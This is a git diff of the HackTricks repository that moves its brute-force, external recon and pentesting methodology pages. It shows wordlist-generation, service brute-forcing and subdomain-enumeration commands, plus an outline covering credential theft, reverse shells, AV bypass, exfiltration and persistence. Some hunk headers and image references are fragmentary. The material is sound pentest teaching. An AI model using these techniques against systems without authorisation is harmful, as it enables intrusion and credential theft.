@@ -16,8 +18,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)Support HackTricks and get benefits!
@@ -16,22 +18,21 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)Support HackTricks and get benefits!
@@ -16,10 +18,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)Support HackTricks and get benefits!
@@ -16,28 +18,27 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)Support HackTricks and get benefits!
@@ -16,38 +18,37 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
@@ -16,23 +16,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-{% hint style="warning" %}
-**Support HackTricks and get benefits!**
-
-Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access the **latest version of the PEASS or download HackTricks in PDF**?
-Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-
-Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-
-Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-
-**Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
-
-**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
-{% endhint %}
-
-# Default Credentials
+## Default Credentials
**Search in google** for default credentials of the technology that is being used, or **try this links**:
@@ -48,11 +32,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [**http://www.passwordsdatabase.com/**](http://www.passwordsdatabase.com)
* [**https://many-passwords.github.io/**](https://many-passwords.github.io)
-# **Create your own Dictionaries**
+## **Create your own Dictionaries**
Find as much information about the target as you can and generate a custom dictionary. Tools that may help:
-## Crunch
+### Crunch
```bash
crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
@@ -65,13 +49,13 @@ crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using chars
crunch 6 8 -t ,@@^^%%
```
-## Cewl
+### Cewl
```bash
cewl example.com -m 5 -w words.txt
```
-## [CUPP](https://github.com/Mebus/cupp)
+### [CUPP](https://github.com/Mebus/cupp)
Generate passwords based on your knowledge of the victim (names, dates...)
@@ -79,9 +63,9 @@ Generate passwords based on your knowledge of the victim (names, dates...)
python3 cupp.py -h
```
-## [pydictor](https://github.com/LandGrey/pydictor)
+### [pydictor](https://github.com/LandGrey/pydictor)
-## Wordlists
+### Wordlists
* [**https://github.com/danielmiessler/SecLists**](https://github.com/danielmiessler/SecLists)
* [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium)
@@ -89,11 +73,11 @@ python3 cupp.py -h
* [**https://github.com/google/fuzzing/tree/master/dictionaries**](https://github.com/carlospolop/hacktricks/tree/95b16dc7eb952272459fc877e4c9d0777d746a16/google/fuzzing/tree/master/dictionaries/README.md)
* [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm**](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm)
-# Services
+## Services
Ordered alphabetically by service name.
-## AFP
+### AFP
```bash
nmap -p 548 --script afp-brute Support HackTricks and get benefits!
@@ -671,5 +654,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**Support HackTricks and get benefits!
@@ -16,15 +18,12 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) (2) (1) (2).png)
****\
-**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!\
-
+ (2) (1) (1) (1).png)
\
+**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!\\
{% embed url="https://go.intigriti.com/hacktricks" %}
-{% endhint %}
-# Assets discoveries
+## Assets discoveries
> So you were said that everything belonging to some company is inside the scope, and you want to figure out what this company actually owns.
@@ -35,7 +34,7 @@ The goal of this phase is to obtain all the **companies owned by the main compan
3. Use reverse whois lookups to search for other entries (organisation names, domains...) related to the first one (this can be done recursively)
4. Use other techniques like shodan `org`and `ssl`filters to search for other assets (the `ssl` trick can be done recursively).
-## **Acquisitions**
+### **Acquisitions**
First of all, we need to know which **other companies are owned by the main company**.\
One option is to visit [https://www.crunchbase.com/](https://www.crunchbase.com), **search** for the **main company**, and **click** on "**acquisitions**". There you will see other companies acquired by the main one.\
@@ -43,7 +42,7 @@ Other option is to visit the **Wikipedia** page of the main company and search f
> Ok, at this point you should know all the companies inside the scope. Lets figure out how to find their assets.
-## **ASNs**
+### **ASNs**
An autonomous system number (**ASN**) is a **unique number** assigned to an **autonomous system** (AS) by the **Internet Assigned Numbers Authority (IANA)**.\
An **AS** consists of **blocks** of **IP addresses** which have a distinctly defined policy for accessing external networks and are administered by a single organisation but may be made up of several operators.
@@ -61,13 +60,13 @@ amass intel -asn 8911,50313,394161
You can find the IP ranges of an organisation also using [http://asnlookup.com/](http://asnlookup.com) (it has free API).\
You can fins the IP and ASN of a domain using [http://ipv4info.com/](http://ipv4info.com).
-## **Looking for vulnerabilities**
+### **Looking for vulnerabilities**
At this point we known **all the assets inside the scope**, so if you are allowed you could launch some **vulnerability scanner** (Nessus, OpenVAS) over all the hosts.\
-Also, you could launch some [**port scans**](../pentesting/pentesting-network/#discovering-hosts-from-the-outside) **or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible services running.\
+Also, you could launch some [**port scans**](../pentesting-network/#discovering-hosts-from-the-outside) **or use services like** shodan **to find** open ports **and depending on what you find you should** take a look in this book to how to pentest several possible services running.\
**Also, It could be worth it to mention that you can also prepare some** default username **and** passwords **lists and try to** bruteforce services with [https://github.com/x90skysn3k/brutespray](https://github.com/x90skysn3k/brutespray).
-# Domains
+## Domains
> We know all the companies inside the scope and their assets, it's time to find the domains inside the scope.
@@ -75,7 +74,7 @@ _Please, note that in the following purposed techniques you can also find subdom
First of all you should look for the **main domain**(s) of each company. For example, for _Tesla Inc._ is going to be _tesla.com_.
-## **Reverse DNS**
+### **Reverse DNS**
As you have found all the IP ranges of the domains you could try to perform **reverse dns lookups** on those **IPs to find more domains inside the scope**. Try to use some dns server of the victim or some well-known dns server (1.1.1.1, 8.8.8.8)
@@ -89,7 +88,7 @@ dnsrecon -r 157.240.221.35/24 -n 8.8.8.8 #Using google dns
For this to work, the administrator has to enable manually the PTR.\
You can also use a online tool for this info: [http://ptrarchive.com/](http://ptrarchive.com)
-## **Reverse Whois (loop)**
+### **Reverse Whois (loop)**
Inside a **whois** you can find a lot of interesting **information** like **organisation name**, **address**, **emails**, phone numbers... But which is even more interesting is that you can find **more assets related to the company** if you perform **reverse whois lookups by any of those fields** (for example other whois registries where the same email appears).\
You can use online tools like:
@@ -107,7 +106,7 @@ You can also perform some automatic reverse whois discovery with [amass](https:/
**Note that you can use this technique to discover more domain names every time you find a new domain.**
-## **Trackers**
+### **Trackers**
If find the **same ID of the same tracker** in 2 different pages you can suppose that **both pages** are **managed by the same team**.\
For example, if you see the same **Google Analytics ID** or the same **Adsense ID** on several pages.
@@ -119,7 +118,7 @@ There are some pages that let you search by these trackers and more:
* [**Publicwww**](https://publicwww.com)
* [**SpyOnWeb**](http://spyonweb.com)
-## **Favicon**
+### **Favicon**
Did you know that we can find related domains and sub domains to our target by looking for the same favicon icon hash? This is exactly what [favihash.py](https://github.com/m4ll0k/Bug-Bounty-Toolz/blob/master/favihash.py) tool made by [@m4ll0k2](https://twitter.com/m4ll0k2) does. Here’s how to use it:
@@ -138,7 +137,7 @@ Moreover, you can also search technologies using the favicon hash as explained i
hodan search org:"Target" http.favicon.hash:116323821 --fields ip_str,port --separator " " | awk '{print $1":"$2}'
```
-## **Other ways**
+### **Other ways**
**Note that you can use this technique to discover more domain names every time you find a new domain.**
@@ -156,20 +155,20 @@ Go to the main page an find something that identifies the company, like the copy
[**Assetfinder** ](https://github.com/tomnomnom/assetfinder)is a tool that look for **domains related** with a main domain and **subdomains** of them, pretty amazing.
-## **Looking for vulnerabilities**
+### **Looking for vulnerabilities**
-Check for some [domain takeover](../pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using some a domain** but they **lost the ownership**. Just register it (if cheap enough) and let know the company.
+Check for some [domain takeover](../../pentesting-web/domain-subdomain-takeover.md#domain-takeover). Maybe some company is **using some a domain** but they **lost the ownership**. Just register it (if cheap enough) and let know the company.
-If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
+If you find any **domain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
_Note that sometimes the domain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
-# Subdomains
+## Subdomains
> We know all the companies inside the scope, all the assets of each company and all the domains related to the companies.
It's time to find all the possible subdomains of each found domain.
-## **DNS**
+### **DNS**
Let's try to get **subdomains** from the **DNS** records. We should also try for **Zone Transfer** (If vulnerable, you should report it).
@@ -177,7 +176,7 @@ Let's try to get **subdomains** from the **DNS** records. We should also try for
dnsrecon -a -d tesla.com
```
-## **OSINT**
+### **OSINT**
The fastest way to obtain a lot of subdomains is search in external sources. I'm not going to discuss which sources are the bests and how to use them, but you can find here several utilities: [https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html](https://pentester.land/cheatsheets/2018/11/14/subdomains-enumeration-cheatsheet.html)
@@ -202,7 +201,7 @@ This project offers for **free all the subdomains related to bug-bounty programs
You could also find subdomains scrapping the web pages and parsing them (including JS files) searching for subdomains using [SubDomainizer](https://github.com/nsonaniya2010/SubDomainizer) or [subscraper](https://github.com/Cillian-Collins/subscraper).
-## **RapidDNS**
+### **RapidDNS**
Quickly find subdomains using [RapidDNS](https://rapiddns.io) API (from [link](https://twitter.com/Verry\_\_D/status/1282293265597779968)):
@@ -215,7 +214,7 @@ curl -s "https://rapiddns.io/subdomain/$1?full=1" \
}
```
-## **Shodan**
+### **Shodan**
You found **dev-int.bigcompanycdn.com**, make a Shodan query like the following:
@@ -226,7 +225,7 @@ It is possible to use Shodan from the official CLI to quickly analyze all IPs in
* https://book.hacktricks.xyz/external-recon-methodology
-## **DNS Brute force**
+### **DNS Brute force**
Let's try to find new **subdomains** brute-forcing DNS servers using possible subdomain names.\
The most recommended tools for this are [**massdns**](https://github.com/blechschmidt/massdns)**,** [**gobuster**](https://github.com/OJ/gobuster)**,** [**aiodnsbrute**](https://github.com/blark/aiodnsbrute) **and** [**shuffledns**](https://github.com/projectdiscovery/shuffledns). The first one is faster but more prone to errors (you should always check for **false positives**) and the second one **is more reliable** (always use gobuster).
@@ -255,7 +254,7 @@ puredns bruteforce all.txt domain.com
Note how these tools require a **list of IPs of public DNSs**. If these public DNSs are malfunctioning (DNS poisoning for example) you will get bad results. In order to generate a list of trusted DNS resolvers you can download the resolvers from [https://public-dns.info/nameservers-all.txt](https://public-dns.info/nameservers-all.txt) and use [**dnsvalidator**](https://github.com/vortexau/dnsvalidator) to filter them.
-## **VHosts / Virtual Hosts**
+### **VHosts / Virtual Hosts**
You can find some VHosts in IPs using [HostHunter](https://github.com/SpiderLabs/HostHunter)
@@ -279,7 +278,7 @@ VHostScan -t example.com
With this technique you may even be able to access internal/hidden endpoints.
{% endhint %}
-## **CORS Brute Force**
+### **CORS Brute Force**
Sometimes you will find pages that only return the header _**Access-Control-Allow-Origin**_ when a valid domain/subdomain is set in the _**Origin**_ header. In these scenarios, you can abuse this behavior to **discover** new **subdomains**.
@@ -287,28 +286,28 @@ Sometimes you will find pages that only return the header _**Access-Control-Allo
ffuf -w subdomains-top1million-5000.txt -u http://10.10.10.208 -H 'Origin: http://FUZZ.crossfit.htb' -mr "Access-Control-Allow-Origin" -ignore-body
```
-## **DNS Brute Force v2**
+### **DNS Brute Force v2**
Once you have finished looking for subdomains you can use [**dnsgen**](https://github.com/ProjectAnte/dnsgen)**,** [**altdns**](https://github.com/infosec-au/altdns) and [**gotator**](https://github.com/Josue87/gotator) to generate possible permutations of the discovered subdomains and use again **massdns** and **gobuster** to search new domains.
-## **Buckets Brute Force**
+### **Buckets Brute Force**
-While looking for **subdomains** keep an eye to see if it is **pointing** to any type of **bucket**, and in that case [**check the permissions**](../pentesting/pentesting-web/buckets/)**.**\
-Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](../pentesting/pentesting-web/buckets/).
+While looking for **subdomains** keep an eye to see if it is **pointing** to any type of **bucket**, and in that case [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/)**.**\
+Also, as at this point you will know all the domains inside the scope, try to [**brute force possible bucket names and check the permissions**](../../network-services-pentesting/pentesting-web/buckets/).
-## **Monitorization**
+### **Monitorization**
You can **monitor** if **new subdomains** of a domain are created by monitoring the **Certificate Transparency** Logs [**sublert** ](https://github.com/yassineaboukir/sublert/blob/master/sublert.py)does.
-## **Looking for vulnerabilities**
+### **Looking for vulnerabilities**
-Check for possible [**subdomain takeovers**](../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).\
-If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](../pentesting/pentesting-web/buckets/).
+Check for possible [**subdomain takeovers**](../../pentesting-web/domain-subdomain-takeover.md#subdomain-takeover).\
+If the **subdomain** is pointing to some **S3 bucket**, [**check the permissions**](../../network-services-pentesting/pentesting-web/buckets/).
-If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting/pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
+If you find any **subdomain with an IP different** from the ones you already found in the assets discovery, you should perform a **basic vulnerability scan** (using Nessus or OpenVAS) and some [**port scan**](../pentesting-network/#discovering-hosts-from-the-outside) with **nmap/masscan/shodan**. Depending on which services are running you can find in **this book some tricks to "attack" them**.\
_Note that sometimes the subdomain is hosted inside an IP that is not controlled by the client, so it's not in the scope, be careful._
-# Web servers hunting
+## Web servers hunting
> We have found all the companies and their assets and we know IP ranges, domains and subdomains inside the scope. It's time to search for web servers.
@@ -316,7 +315,7 @@ In the previous steps you have probably already performed some **recon of the IP
Please, note that this will be **oriented for web apps discovery**, so you should **perform the vulnerability** and **port scanning** also (**if allowed** by the scope).
-A **fast method** to discover **ports open** related to **web** servers using [**masscan** can be found here](../pentesting/pentesting-network/#http-port-discovery).\
+A **fast method** to discover **ports open** related to **web** servers using [**masscan** can be found here](../pentesting-network/#http-port-discovery).\
Another friendly tool to look for web servers is [**httprobe**](https://github.com/tomnomnom/httprobe) **and** [**fprobe**](https://github.com/theblackturtle/fprobe). You just pass a list of domains and it will try to connect to port 80 (http) and 443 (https). Additionaly, you can indicate to try other ports:
```bash
@@ -324,17 +323,17 @@ cat /tmp/domains.txt | httprobe #Test all domains inside the file for port 80 an
cat /tmp/domains.txt | httprobe -p http:8080 -p https:8443 #Check port 80, 443 and 8080 and 8443
```
-## **Screenshots**
+### **Screenshots**
Now that you have discovered **all the web servers** present in the scope (among the **IPs** of the company and all the **domains** and **subdomains**) you probably **don't know where to start**. So, let's make it simple and start just taking screenshots of all of them. Just by **taking a look** at the **main page** you can find **weird** endpoints that are more **prone** to be **vulnerable**.
To perform the proposed idea you can use [**EyeWitness**](https://github.com/FortyNorthSecurity/EyeWitness), [**HttpScreenshot**](https://github.com/breenmachine/httpscreenshot), [**Aquatone**](https://github.com/michenriksen/aquatone), \[shutter]\([**https://shutter-project.org/downloads/**](https://shutter-project.org/downloads/)) or [**webscreenshot**](https://github.com/maaaaz/webscreenshot)**.**
-## Cloud Assets
+### Cloud Assets
Just with some **specific keywords** identifying the company it's possible to enumerate possible cloud assets belonging to them with tools like [**cloud\_enum**](https://github.com/initstring/cloud\_enum)**,** [**CloudScraper**](https://github.com/jordanpotti/CloudScraper) **or** [**cloudlist**](https://github.com/projectdiscovery/cloudlist)**.**
-# Recapitulation 1
+## Recapitulation 1
> Congratulations! At this point you have already perform all the basic enumeration. Yes, it's basic because a lot more enumeration can be done (will see more tricks later).\
> Do you know that the BBs experts recommends to spend only 10-15mins in this phase? But don't worry, one you have practice you will do this even faster than that.
@@ -347,9 +346,9 @@ So you have already:
4. Found all the **subdomains** of the domains (any subdomain takeover?)
5. Found all the **web servers** and took a **screenshot** of them (anything weird worth a deeper look?)
-Then, it's time for the real Bug Bounty hunt! In this methodology I'm **not going to talk about how to scan hosts** (you can see a [guide for that here](../pentesting/pentesting-network/)), how to use tools like Nessus or OpenVas to perform a **vuln scan** or how to **look for vulnerabilities** in the services open (this book already contains tons of information about possible vulnerabilities on a lot of common services). **But, don't forget that if the scope allows it, you should give it a try.**
+Then, it's time for the real Bug Bounty hunt! In this methodology I'm **not going to talk about how to scan hosts** (you can see a [guide for that here](../pentesting-network/)), how to use tools like Nessus or OpenVas to perform a **vuln scan** or how to **look for vulnerabilities** in the services open (this book already contains tons of information about possible vulnerabilities on a lot of common services). **But, don't forget that if the scope allows it, you should give it a try.**
-## Github leaked secrets
+### Github leaked secrets
{% content-ref url="github-leaked-secrets.md" %}
[github-leaked-secrets.md](github-leaked-secrets.md)
@@ -357,11 +356,11 @@ Then, it's time for the real Bug Bounty hunt! In this methodology I'm **not goin
You can also search for leaked secrets in all open repository platforms using: [https://searchcode.com/?q=auth\_key](https://searchcode.com/?q=auth\_key)
-## [**Pentesting Web Methodology**](../pentesting/pentesting-web/)
+### [**Pentesting Web Methodology**](../../network-services-pentesting/pentesting-web/)
-Anyway, the **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](../pentesting/pentesting-web/).
+Anyway, the **majority of the vulnerabilities** found by bug hunters resides inside **web applications**, so at this point I would like to talk about a **web application testing methodology**, and you can [**find this information here**](../../network-services-pentesting/pentesting-web/).
-# Recapitulation 2
+## Recapitulation 2
> Congratulations! The testing has finished! I hope you have find some vulnerabilities.
@@ -370,7 +369,7 @@ As you can see there is a lot of different vulnerabilities to search for.
**If you have find any vulnerability thanks to this book, please reference the book in your write-up.**
-## **Automatic Tools**
+### **Automatic Tools**
There are several tools out there that will perform part of the proposed actions against a given scope.
@@ -379,7 +378,7 @@ There are several tools out there that will perform part of the proposed actions
* [**https://github.com/six2dez/reconftw**](https://github.com/six2dez/reconftw)
* [**https://github.com/hackerspider1/EchoPwn**](https://github.com/hackerspider1/EchoPwn) - A little old and not updated
-# **References**
+## **References**
* **All free courses of** [**@Jhaddix**](https://twitter.com/Jhaddix) **(like** [**The Bug Hunter's Methodology v4.0 - Recon Edition**](https://www.youtube.com/watch?v=p4JgIu1mceI)**)**
diff --git a/external-recon-methodology/github-leaked-secrets.md b/generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md
similarity index 100%
rename from external-recon-methodology/github-leaked-secrets.md
rename to generic-methodologies-and-resources/external-recon-methodology/github-leaked-secrets.md
diff --git a/pentesting-methodology.md b/generic-methodologies-and-resources/pentesting-methodology.md
similarity index 69%
rename from pentesting-methodology.md
rename to generic-methodologies-and-resources/pentesting-methodology.md
index a0193fce..d37d1cd4 100644
--- a/pentesting-methodology.md
+++ b/generic-methodologies-and-resources/pentesting-methodology.md
@@ -6,6 +6,8 @@ description: >-
# Pentesting Methodology
+## Pentesting Methodology
+
Support HackTricks and get benefits!
@@ -22,23 +24,21 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com).png)
****
+ (2) (1) (1) (2).png)
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
{% embed url="https://go.intigriti.com/hacktricks" %}
-{% endhint %}
-# Pentesting Methodology
+## Pentesting Methodology
-.png>)
+
-## 0- Physical Attacks
+### 0- Physical Attacks
-Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](physical-attacks/physical-attacks.md) and others about [**escaping from GUI applications**](physical-attacks/escaping-from-gui-applications/).
+Do you have **physical access** to the machine that you want to attack? You should read some [**tricks about physical attacks**](../physical-attacks/physical-attacks.md) and others about [**escaping from GUI applications**](../physical-attacks/escaping-from-gui-applications/).
-## 1 - [Discovering hosts inside the network ](pentesting/pentesting-network/#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/)
+### 1 - [Discovering hosts inside the network ](pentesting-network/#discovering-hosts)/ [Discovering Assets of the company](external-recon-methodology/)
**Depending** if the **test** you are perform is an **internal or external test** you may be interested on finding **hosts inside the company network** (internal test) or **finding assets of the company on the internet** (external test).
@@ -46,117 +46,117 @@ Do you have **physical access** to the machine that you want to attack? You shou
Note that if you are performing an external test, once you manage to obtain access to the internal network of the company you should re-start this guide.
{% endhint %}
-## **2-** [**Having Fun with the network**](pentesting/pentesting-network/) **(Internal)**
+### **2-** [**Having Fun with the network**](pentesting-network/) **(Internal)**
**This section only applies if you are performing an internal test.**\
-Before attacking a host maybe you prefer to **steal some credentials** **from the network** or **sniff** some **data** to learn **passively/actively(MitM)** what can you find inside the network. You can read [**Pentesting Network**](pentesting/pentesting-network/#sniffing).
+Before attacking a host maybe you prefer to **steal some credentials** **from the network** or **sniff** some **data** to learn **passively/actively(MitM)** what can you find inside the network. You can read [**Pentesting Network**](pentesting-network/#sniffing).
-## 3- [Port Scan - Service discovery](pentesting/pentesting-network/#scanning-hosts)
+### 3- [Port Scan - Service discovery](pentesting-network/#scanning-hosts)
-The first thing to do when **looking for vulnerabilities in a host** is to know which **services are running** in which ports. Let's see the[ **basic tools to scan ports of hosts**](pentesting/pentesting-network/#scanning-hosts).
+The first thing to do when **looking for vulnerabilities in a host** is to know which **services are running** in which ports. Let's see the[ **basic tools to scan ports of hosts**](pentesting-network/#scanning-hosts).
-## **4-** [Searching service version exploits](search-exploits.md)
+### **4-** [Searching service version exploits](search-exploits.md)
Once you know which services are running, and maybe their version, you have to **search for known vulnerabilities**. Maybe you get lucky and there is a exploit to give you a shell...
-## **5-** Pentesting Services
+### **5-** Pentesting Services
If there isn't any fancy exploit for any running service, you should look for **common misconfigurations in each service running.**
**Inside this book you will find a guide to pentest the most common services** (and others that aren't so common)**. Please, search in the left index the** _**PENTESTING**_ **section** (the services are ordered by their default ports).
-**I want to make a special mention of the** [**Pentesting Web**](pentesting/pentesting-web/) **part (as it is the most extensive one).**\
+**I want to make a special mention of the** [**Pentesting Web**](../network-services-pentesting/pentesting-web/) **part (as it is the most extensive one).**\
Also, a small guide on how to[ **find known vulnerabilities in software**](search-exploits.md) can be found here.
**If your service is not inside the index, search in Google** for other tutorials and **let me know if you want me to add it.** If you **can't find anything** in Google, perform your **own blind pentesting**, you could start by **connecting to the service, fuzzing it and reading the responses** (if any).
-### 5.1 Automatic Tools
+#### 5.1 Automatic Tools
There are also several tools that can perform **automatic vulnerabilities assessments**. **I would recommend you to try** [**Legion**](https://github.com/carlospolop/legion)**, which is the tool that I have created and it's based on the notes about pentesting services that you can find in this book.**
-### **5.2 Brute-Forcing services**
+#### **5.2 Brute-Forcing services**
In some scenarios a **Brute-Force** could be useful to **compromise** a **service**. [**Find here a CheatSheet of different services brute forcing**](brute-force.md)**.**
-## 6- [Phishing](phishing-methodology/)
+### 6- [Phishing](phishing-methodology/)
If at this point you haven't found any interesting vulnerability you **may need to try some phishing** in order to get inside the network. You can read my phishing methodology [here](phishing-methodology/):
-## **7-** [**Getting Shell**](shells/shells/)
+### **7-** [**Getting Shell**](shells/)
-Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](shells/shells/).
+Somehow you should have found **some way to execute code** in the victim. Then, [a list of possible tools inside the system that you can use to get a reverse shell would be very useful](shells/).
Specially in Windows you could need some help to **avoid antiviruses**: \[Check this page]\(windows/av-bypass.md)**.**
-## 8- Inside
+### 8- Inside
If you have troubles with the shell, you can find here a small **compilation of the most useful commands** for pentesters:
-* [**Linux**](linux-unix/useful-linux-commands/)
-* [**Windows (CMD)**](windows/basic-cmd-for-pentesters.md)
-* [**Winodows (PS)**](windows/basic-powershell-for-pentesters/)
+* [**Linux**](../linux-hardening/useful-linux-commands/)
+* [**Windows (CMD)**](../windows-hardening/basic-cmd-for-pentesters.md)
+* [**Winodows (PS)**](../windows-hardening/basic-powershell-for-pentesters/)
-## **9 -** [**Exfiltration**](exfiltration.md)
+### **9 -** [**Exfiltration**](exfiltration.md)
You will probably need to **extract some data from the victim** or even **introduce something** (like privilege escalation scripts). **Here you have a** [**post about common tools that you can use with these purposes**](exfiltration.md)**.**
-## **10- Privilege Escalation**
+### **10- Privilege Escalation**
-### **10.1- Local Privesc**
+#### **10.1- Local Privesc**
If you are **not root/Administrator** inside the box, you should find a way to **escalate privileges.**\
-Here you can find a **guide to escalate privileges locally in** [**Linux**](linux-unix/privilege-escalation/) **and in** [**Windows**](windows/windows-local-privilege-escalation/)**.**\
+Here you can find a **guide to escalate privileges locally in** [**Linux**](../linux-hardening/privilege-escalation/) **and in** [**Windows**](../windows-hardening/windows-local-privilege-escalation/)**.**\
You should also check this pages about how does **Windows work**:
-* [**Authentication, Credentials, Token privileges and UAC**](windows/authentication-credentials-uac-and-efs.md)
-* How does [**NTLM works**](windows/ntlm/)
-* How to [**steal credentials**](windows/stealing-credentials/) in Windows
-* Some tricks about [_**Active Directory**_](windows/active-directory-methodology/)
+* [**Authentication, Credentials, Token privileges and UAC**](../windows-hardening/authentication-credentials-uac-and-efs.md)
+* How does [**NTLM works**](../windows-hardening/ntlm/)
+* How to [**steal credentials**](../windows-hardening/stealing-credentials/) in Windows
+* Some tricks about [_**Active Directory**_](../windows-hardening/active-directory-methodology/)
**Don't forget to checkout the best tools to enumerate Windows and Linux local Privilege Escalation paths:** [**Suite PEAS**](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite)
-### **10.2- Domain Privesc**
+#### **10.2- Domain Privesc**
-Here you can find a [**methodology explaining the most common actions to enumerate, escalate privileges and persist on an Active Directory**](windows/active-directory-methodology/). Even if this is just a subsection of a section, this process could be **extremely delicate** on a Pentesting/Red Team assignment.
+Here you can find a [**methodology explaining the most common actions to enumerate, escalate privileges and persist on an Active Directory**](../windows-hardening/active-directory-methodology/). Even if this is just a subsection of a section, this process could be **extremely delicate** on a Pentesting/Red Team assignment.
-## 11 - POST
+### 11 - POST
-### **11**.1 - Looting
+#### **11**.1 - Looting
Check if you can find more **passwords** inside the host or if you have **access to other machines** with the **privileges** of your **user**.\
-Find here different ways to [**dump passwords in Windows**](windows/stealing-credentials/).
+Find here different ways to [**dump passwords in Windows**](../windows-hardening/stealing-credentials/).
-### 11.2 - Persistence
+#### 11.2 - Persistence
**Use 2 o 3 different types of persistence mechanism so you won't need to exploit the system again.**\
-**Here you can find some** [**persistence tricks on active directory**](windows/active-directory-methodology/#persistence)**.**
+**Here you can find some** [**persistence tricks on active directory**](../windows-hardening/active-directory-methodology/#persistence)**.**
TODO: Complete persistence Post in Windows & Linux
-## 12 - Pivoting
+### 12 - Pivoting
With the **gathered credentials** you could have access to other machines, or maybe you need to **discover and scan new hosts** (start the Pentesting Methodology again) inside new networks where your victim is connected.\
In this case tunnelling could be necessary. Here you can find [**a post talking about tunnelling**](tunneling-and-port-forwarding.md).\
-You definitely should also check the post about [Active Directory pentesting Methodology](windows/active-directory-methodology/). There you will find cool tricks to move laterally, escalate privileges and dump credentials.\
-Check also the page about [**NTLM**](windows/ntlm/), it could be very useful to pivot on Windows environments..
+You definitely should also check the post about [Active Directory pentesting Methodology](../windows-hardening/active-directory-methodology/). There you will find cool tricks to move laterally, escalate privileges and dump credentials.\
+Check also the page about [**NTLM**](../windows-hardening/ntlm/), it could be very useful to pivot on Windows environments..
-## MORE
+### MORE
-### [Android Applications](mobile-apps-pentesting/android-app-pentesting/)
+#### [Android Applications](../mobile-pentesting/android-app-pentesting/)
-### **Exploiting**
+#### **Exploiting**
-* [**Basic Linux Exploiting**](exploiting/linux-exploiting-basic-esp/)
-* [**Basic Windows Exploiting**](exploiting/windows-exploiting-basic-guide-oscp-lvl.md)
-* [**Basic exploiting tools**](exploiting/tools/)
+* [**Basic Linux Exploiting**](../exploiting/linux-exploiting-basic-esp/)
+* [**Basic Windows Exploiting**](../exploiting/windows-exploiting-basic-guide-oscp-lvl.md)
+* [**Basic exploiting tools**](../exploiting/tools/)
-### [**Basic Python**](misc/basic-python/)
+#### [**Basic Python**](../misc/basic-python/)
-### **Crypto tricks**
+#### **Crypto tricks**
-* [**ECB**](cryptography/electronic-code-book-ecb.md)
-* [**CBC-MAC**](cryptography/cipher-block-chaining-cbc-mac-priv.md)
